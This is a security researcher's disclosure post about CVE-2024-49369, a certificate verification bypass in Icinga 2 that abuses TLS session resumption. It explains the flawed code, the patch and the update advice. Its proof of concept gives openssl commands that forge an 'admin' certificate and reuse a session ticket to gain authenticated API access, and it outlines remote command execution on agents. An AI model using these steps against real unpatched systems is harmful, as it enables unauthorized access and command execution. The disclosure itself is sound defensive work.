Uncovering a Client Certificate Verification Bypass in Icinga

by Guest Author | Nov 26, 2024

This is a guest blogpost from Finn Steglich.

As of Icinga 2 versions 2.14.3, 2.13.10, 2.12.11, and 2.11.12, released on 12 November 2024, a critical security issue affecting Icinga 2 Masters, Satellites and Agents has been addressed. Now we’d like to release some more details on the actual vulnerability, which was assigned CVE-2024-49369.

If you have not yet updated Icinga in your environment, you should stop reading this blog post and do so immediately.

Motivation

As a penetration tester and security researcher, I’ve seen Icinga installations in several company networks. There is the characteristic TCP port 5665 that shows up in portscans, there is encrypted traffic in network captures, and on the systems with active monitoring, there is very often a service running. In many environments, a lot of interesting target systems are monitored with Icinga agents, which makes the Icinga infrastructure itself a lucrative target for attackers.

I have probably done some basic blackbox tests against Icinga services before. And I definitely had a man-in-the-middle attack setup in a prior engagement. But Icinga passed all of these typical attacks with flying colors. The mutual TLS authentication of the internal APIs, combined with up-to-date crypto libraries, strong default configurations and its own managed certificate authority built into the Icinga solution, gave little to no room for security-relevant findings.

Thus, when I circled back to Icinga this time around, I took a deeper dive into the source code, looked at the routines for the communication protocol and most importantly the authentication of connections. And I found an irregularity that turned out to be a critical vulnerability.

Certificate Authentication in Icinga

If you log in to the Icinga API service with a client certificate (which can be configured for the REST API but is also the only authentication used by the internal JSON-RPC communication), the application will at some point test whether your certificate is valid and trusted, and grant you access if it is.

To do that, the function UnbufferedAsioTlsStream::IsVerifyOK will be called which, on its own, is very simple (lib/base/tlsstream.cpp):

bool UnbufferedAsioTlsStream::IsVerifyOK() const
{
    return m_VerifyOK;
}

If we check where the member field m_VerifyOK is modified, there are only two locations:

1. the constructor that initializes the value (lib/base/tlsstream.hpp):

inline
UnbufferedAsioTlsStream(UnbufferedAsioTlsStreamParams& init)
    : AsioTcpTlsStream(init.IoContext, init.SslContext), m_VerifyOK(true), m_Hostname(init.Hostname)
{
}

2. a registered callback for the TLS handshake (lib/base/tlsstream.cpp):

set_verify_callback([this](bool preverified, ssl::verify_context& ctx) {
    if (!preverified) {
        m_VerifyOK = false;

        // [...]
    }

    return true;
});

What piqued my interest was that the value is initialized with true, which would indicate a successful verification of the client certificate. Typical fail-secure coding patterns would recommend treating every connection as untrusted until properly verified, not the other way around. But there is a reason for that…

TLS Verification Callbacks

The underlying TLS library OpenSSL already implements most of the certificate verification but gives programmers full control over how to handle the results. The Boost libraries that Icinga uses build on that, but also allow for further fine-tuning. One of the most used options is the verification callback.

To use this option, you first register a callback function before the TLS handshake. During the handshake, the TLS stack will then call this function whenever there are peer certificate verification results. The TLS stack includes the result of its own certificate verification as the preverified argument to this callback.

Most likely there are several callbacks, at least one for each certificate layer. You will get, for instance, one that checked the certificate of the Certificate Authority (CA), then another one that checked the leaf certificate of the peer. If at least one of the preverified results in any of the callbacks is false, that means that you normally cannot trust the peer certificate. Imagine for instance they send a valid CA indication, but the signature of the leaf certificate is faulty, which would indicate a spoofed certificate. Or they used a self-signed certificate, in which case the CA (which is the same as the leaf certificate) cannot be trusted.

And that is most likely the reason why the Icinga developers initialized m_VerifyOK with true and unset it as soon as a single callback reports a failed verification.
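The callback sequence described above can be illustrated with a small toy model. This is only a sketch under stated assumptions: it uses neither OpenSSL nor Boost, the names CertCheck, VerifyCallback, RunVerification and ChainIsTrusted are invented for this illustration, and the strict "CA first, leaf last" ordering is a simplification of what a real TLS stack does.

```cpp
#include <cassert>
#include <functional>
#include <string>
#include <vector>

// Hypothetical stand-in for one certificate of the peer's chain, together with
// the verdict the TLS stack reached for it before invoking the callback.
struct CertCheck {
    std::string subject;
    bool preverified;
};

// Same shape as the callback in the article: it receives the stack's own
// verdict and returns whether the handshake may continue.
using VerifyCallback = std::function<bool(bool preverified, const CertCheck& cert)>;

// Toy handshake: invoke the callback once per chain element (CA first, leaf last).
// Returns true if the handshake completed, false if a callback aborted it.
bool RunVerification(const std::vector<CertCheck>& chain, const VerifyCallback& callback)
{
    for (const CertCheck& cert : chain) {
        if (!callback(cert.preverified, cert)) {
            return false;
        }
    }
    return true;
}

// Runs the toy handshake with a permissive callback that never aborts and
// reports whether every single check was preverified.
bool ChainIsTrusted(const std::vector<CertCheck>& chain)
{
    assert(!chain.empty()); // this helper models a peer that did send certificates

    bool allOk = true; // start trusted, unset on the first failure
    bool completed = RunVerification(chain, [&allOk](bool preverified, const CertCheck&) {
        if (!preverified) {
            allOk = false;
        }
        return true; // keep the handshake going, like the callback shown earlier
    });

    return completed && allOk;
}
```

In this model, a chain such as {"Icinga CA", true}, {"admin", false} completes the handshake but is reported as untrusted, while a callback that returns its preverified argument unchanged would abort the handshake at the faulty certificate.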

However, I kept wondering: what if we can, for some reason, prevent any callbacks from happening at all? In that case, m_VerifyOK stays true, and the connection is trusted even though nothing was ever verified.
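The "zero callbacks" case is easy to see in isolation. The following sketch contrasts the pattern from the Icinga code with a fail-secure variant; FailSecureVerifier and the helper VerdictAfter are hypothetical names made up for this comparison, and the fail-secure class is not what the Icinga patch does, it only shows the difference in defaults.

```cpp
#include <initializer_list>

// Pattern described above: trust is assumed up front and only ever revoked.
class FailOpenVerifier {
public:
    void OnCallback(bool preverified)
    {
        if (!preverified) {
            m_VerifyOK = false;
        }
    }

    bool IsVerifyOK() const { return m_VerifyOK; }

private:
    bool m_VerifyOK = true;
};

// Hypothetical fail-secure variant: trust has to be earned by at least one
// successful callback, and a single failure can never be overwritten.
class FailSecureVerifier {
public:
    void OnCallback(bool preverified)
    {
        if (!preverified) {
            m_State = State::Failed;
        } else if (m_State == State::NotChecked) {
            m_State = State::Passed;
        }
    }

    bool IsVerifyOK() const { return m_State == State::Passed; }

private:
    enum class State { NotChecked, Passed, Failed };
    State m_State = State::NotChecked;
};

// Feeds a sequence of preverified results into a fresh verifier and
// returns its final verdict.
template <typename Verifier>
bool VerdictAfter(std::initializer_list<bool> callbackResults)
{
    Verifier verifier;
    for (bool preverified : callbackResults) {
        verifier.OnCallback(preverified);
    }
    return verifier.IsVerifyOK();
}
```

Both classes agree as long as at least one callback fires. They only differ for an empty sequence: VerdictAfter<FailOpenVerifier>({}) is true, whereas VerdictAfter<FailSecureVerifier>({}) is false.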

A simple way to not have callbacks is to not provide a peer certificate in the TLS handshake. However, Icinga developers thought of that and only check the function IsVerifyOK if there actually was a peer certificate during the handshake.

And if there is a peer certificate, surely it always is verified by the TLS stack, which results in callbacks, right? And then I thought of TLS session resumption…

TLS Session Resumption

TLS handshakes are computationally expensive. That is why TLS offers an option to resume existing sessions, reuse the existing key material and skip most of the handshake. Technically, there are two variants (session ID and session ticket, sometimes called stateful and stateless), and both are supported by the Boost libraries that Icinga uses.

Part of the handshake that is skipped during session resumption is the certificate verification. The results from the initial connection are still stored in the session cache (or ticket), and the peer cannot change certificates in a resumed session, because previously negotiated keys are re-used.

That means that in a resumed session, no certificate verification callbacks will happen, and Icinga will always believe that the connection is trusted. So much for the theory; let’s test this!
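Before turning to a real instance, the theory can be reproduced in a toy model. The sketch below is an assumption-laden simplification: ToyTlsServer, ToyConnection and HandshakeResult are invented names, the "ticket" is just an integer key into a map, and no actual cryptography is involved. It only models which steps run during a full handshake and which are skipped on resumption.

```cpp
#include <map>
#include <string>

// Per-connection state following the vulnerable pattern.
struct ToyConnection {
    std::string peerCN;
    bool resumed = false;
    bool verifyOK = true; // same optimistic default as m_VerifyOK
};

struct HandshakeResult {
    ToyConnection connection;
    int ticket = 0; // hypothetical stand-in for a session ID or session ticket
};

class ToyTlsServer {
public:
    // Full handshake: the verification callback runs and may clear verifyOK.
    // The handshake itself always succeeds, and a resumable session is cached.
    HandshakeResult FullHandshake(const std::string& peerCN, bool signedByTrustedCA)
    {
        HandshakeResult result;
        result.connection.peerCN = peerCN;
        if (!signedByTrustedCA) {
            result.connection.verifyOK = false; // callback with preverified == false
        }
        result.ticket = m_NextTicket++;
        m_SessionCache[result.ticket] = peerCN;
        return result;
    }

    // Resumed handshake: the peer identity comes from the cached session and
    // no verification callback is invoked, so verifyOK keeps its default.
    bool Resume(int ticket, ToyConnection& out) const
    {
        auto it = m_SessionCache.find(ticket);
        if (it == m_SessionCache.end()) {
            return false; // unknown ticket, nothing to resume
        }
        out = ToyConnection();
        out.peerCN = it->second;
        out.resumed = true;
        return true;
    }

private:
    std::map<int, std::string> m_SessionCache;
    int m_NextTicket = 1;
};
```

In this model, FullHandshake("admin", false) yields a connection with verifyOK set to false, but resuming with the returned ticket produces a fresh connection for the same peerCN whose verifyOK is still true.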

Proof of Concept

Let’s assume we know of an API user with certificate authentication and the relevant Common Name (CN) for their certificate (/etc/icinga2/conf.d/api-users.conf):

object ApiUser "admin" {
    client_cn = "admin"
    permissions = [ "*" ]
}

We can now create a self-signed certificate for the relevant CN:

$ openssl req -nodes -new -x509 -keyout ./fake-admin-cert.key -out ./fake-admin-cert.crt -subj "/CN=admin"

Of course, such a certificate would not be trusted by Icinga, since it is not signed by the built-in CA. Let’s still try to connect to the API with it:

$ echo -ne 'GET /v1 HTTP/1.1\r\nHost: 192.168.29.134:5665\r\n\r\n' | openssl s_client -connect 192.168.29.134:5665 -cert ./fake-admin-cert.crt -key ./fake-admin-cert.key -ign_eof -sess_out session.txt
[...]
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
[...]
HTTP/1.1 401 Unauthorized
Server: Icinga/v2.14.0-308-g5e9e0bbcd
WWW-Authenticate: Basic realm="Icinga 2"
Connection: close
Content-Type: text/html
Content-Length: 58

<h1>Unauthorized. Please check your user credentials.</h1>

The TLS handshake will trigger two callbacks to the verify routine, and one of them will set m_VerifyOK to false (due to verify error 18 = X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT in the OpenSSL verification).

This is from the service log:

[2024-10-13 18:26:02 +0200] information/ApiListener: New client connection for identity 'admin' from [::ffff:192.168.29.128]:47026 (certificate validation failed: code 18: self-signed certificate)
[2024-10-13 18:26:02 +0200] warning/HttpServerConnection: Unauthorized request: GET /v1
[2024-10-13 18:26:02 +0200] information/HttpServerConnection: Request GET /v1 (from [::ffff:192.168.29.128]:47026), user: , agent: , status: Unauthorized) took 0ms.
[2024-10-13 18:26:02 +0200] information/HttpServerConnection: HTTP client disconnected (from [::ffff:192.168.29.128]:47026)

So far, so good. However, since we got a TLS connection (which happens because the callback function always returns true and Icinga thus accepts invalid certificates to allow new Icinga nodes to request a certificate from the Icinga CA), we were able to store the session ticket (see parameter -sess_out above).

With that session ticket, we now trigger a new connection. We use -sess_in instead of -sess_out; the -cert and -key parameters are not required anymore, since the client certificate is already part of the initial connection:

$ echo -ne 'GET /v1 HTTP/1.1\r\nHost: 192.168.29.134:5665\r\n\r\n' | openssl s_client -connect 192.168.29.134:5665 -ign_eof -sess_in session.txt
[...]
Reused, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
[...]
HTTP/1.1 200 OK
Server: Icinga/v2.14.0-308-g5e9e0bbcd
Content-Type: text/html
Content-Length: 365

<html><head><title>Icinga 2</title></head><h1>Hello from Icinga 2 (Version: v2.14.0-308-g5e9e0bbcd)!</h1><p>You are authenticated as <b>admin</b>. Your user has the following permissions:</p> <ul><li>*</li></ul><p>More information about API requests is available in the <a href="https://icinga.com/docs/icinga2/latest/" target="_blank">documentation</a>.</p></html>

The TLS session is marked as “Reused”, and there will be no callbacks to the verify routine (because the TLS stack assumes that the verification already happened in the initial connection). Thus m_VerifyOK is still true, and we are successfully authenticated.

Again the service log:

[2024-10-13 18:26:38 +0200] information/ApiListener: New client connection for identity 'admin' from [::ffff:192.168.29.128]:58102 (no Endpoint object found for identity)
[2024-10-13 18:26:38 +0200] information/HttpServerConnection: Request GET /v1 (from [::ffff:192.168.29.128]:58102), user: admin, agent: , status: OK) took 0ms.
[2024-10-13 18:26:48 +0200] information/HttpServerConnection: No messages for HTTP connection have been received in the last 10 seconds.
[2024-10-13 18:26:48 +0200] information/HttpServerConnection: HTTP client disconnected (from [::ffff:192.168.29.128]:58102)

We successfully bypassed the certificate authentication and are now logged in to the REST API with an arbitrary spoofed user and a fake certificate.

Considerations for an Attack

We assumed that the REST API is configured to allow certificate authentication with a specific CN. In real-world attacks, the attacker might not know the CN for an API user, but common names are rarely a secret, so they might be able to guess. Also, if they have a limited, read-only API user, they might be able to list the ApiUser objects and their CNs.

Since there are no REST API users by default, many default installations might still be secure against such an attack. Agent endpoints in particular will most likely not have REST API users.

However, the same attack works against the internal JSON-RPC API. We would need to spoof a parent node to any endpoint (probably using the hostname or FQDN as CN). Then we can update a CheckCommand object and have it executed, which gives us arbitrary command execution on the endpoint, as long as configuration updates and command execution are enabled.

If a connection with a specific parent node already exists, Icinga will not allow a second one, so an attacker has to either wait for the next reload or configuration deployment, or trigger outages or network connection disruptions in other ways to get a successful connection.

Impact of the Vulnerability

Depending on the REST API configuration, attackers might in many environments gain full permissions on the API on master endpoints, which might allow compromise of the entire Icinga environment.

If configuration and command execution are enabled on an endpoint (which is the default for monitored nodes with Icinga agents), a JSON-RPC connection from a spoofed parent node allows an attacker to update the endpoint configuration and execute arbitrary commands on the endpoint. Depending on the configured service user, that might already provide full system compromise in some cases, or limited access in others.

Even if configuration and command execution are not enabled, attackers might still learn sensitive information by, for instance, listening to the results of checks on the endpoint.

Mitigation

Once I notified the Icinga team about the security issue, they quickly started to build and test a patch for the issue.

Instead of storing the verification result in UnbufferedAsioTlsStream, the function IsVerifyOK was changed to request the underlying result from the OpenSSL library (lib/base/tlsstream.cpp):

bool UnbufferedAsioTlsStream::IsVerifyOK()
{
    if (!SSL_is_init_finished(native_handle())) {
        // handshake was not completed
        return false;
    }

    if (GetPeerCertificate() == nullptr) {
        // no peer certificate was sent
        return false;
    }

    return SSL_get_verify_result(native_handle()) == X509_V_OK;
}

The use of the function SSL_get_verify_result ensures that even in resumed sessions, the cached verification result of the initial handshake is used.
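The idea behind the fix can again be shown in a toy model. This sketch does not call OpenSSL; the namespace toy and everything in it are hypothetical names for illustration, and the two constants merely mirror the numeric values of X509_V_OK and of the verify error 18 mentioned earlier. The point is that the verdict lives in the session state shared by the initial and the resumed connection, not in a per-connection flag.

```cpp
#include <memory>
#include <string>
#include <utility>

namespace toy {

constexpr long kVerifyOk = 0;        // mirrors X509_V_OK
constexpr long kSelfSignedLeaf = 18; // mirrors X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT

// Session state that outlives a single connection, including the verdict
// reached during the initial full handshake.
struct Session {
    std::string peerCN;
    bool hasPeerCertificate;
    long verifyResult;
};

using SessionPtr = std::shared_ptr<const Session>;

SessionPtr MakeSession(const std::string& peerCN, bool hasPeerCertificate, long verifyResult)
{
    return std::make_shared<Session>(Session{peerCN, hasPeerCertificate, verifyResult});
}

class Connection {
public:
    Connection(SessionPtr session, bool handshakeFinished)
        : m_Session(std::move(session)), m_HandshakeFinished(handshakeFinished)
    {
    }

    // Same three checks as the patched function, applied to the toy session.
    bool IsVerifyOK() const
    {
        if (!m_HandshakeFinished) {
            return false; // handshake was not completed
        }
        if (!m_Session || !m_Session->hasPeerCertificate) {
            return false; // no peer certificate was sent
        }
        return m_Session->verifyResult == kVerifyOk;
    }

    // A resumed connection shares the session, and with it the cached verdict.
    Connection Resume() const { return Connection(m_Session, true); }

private:
    SessionPtr m_Session;
    bool m_HandshakeFinished;
};

} // namespace toy
```

With this layout, a connection built on a session whose verifyResult is kSelfSignedLeaf stays untrusted, and so does every connection obtained from it via Resume().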

With the releases 2.14.3, 2.13.10, 2.12.11, and 2.11.12, this patch has been included in Icinga, closing the vulnerability. If you still have not updated, you now know why you should do so immediately!

Final Remarks

Overall, I think this vulnerability is interesting because it shows how a few decisions that sound reasonable on their own (initialization and unsetting of the m_VerifyOK variable, allowing connections with untrusted certificates, and TLS session resumption) might, when combined, expose an ecosystem to a critical vulnerability.

I would like to thank the Icinga team for their fast and professional approach in dealing with my initial vulnerability report. They not only found a solid patch and tested, built, and released it for so many platforms, including discontinued end-of-life distributions, but they could also point me to some TLS internals that I could not quite rationalize while discussing the details.

In my opinion, the open discussion of vulnerabilities (in the form of responsible disclosure processes and lessons-learned sessions) is crucial for the maturity of projects and the security community in general. By sharing findings, methods, ways of thinking, and approaches to bug hunting and mitigation, we foster a collaborative environment that security researchers, vulnerability analysts, and developers can use to their advantage. By providing insights into the processes and even proofs of concept, we allow others to reproduce our results, test the security of their own environments and gain awareness of the challenges in security. I would again like to thank everyone involved in the discovery, mitigation, and disclosure process!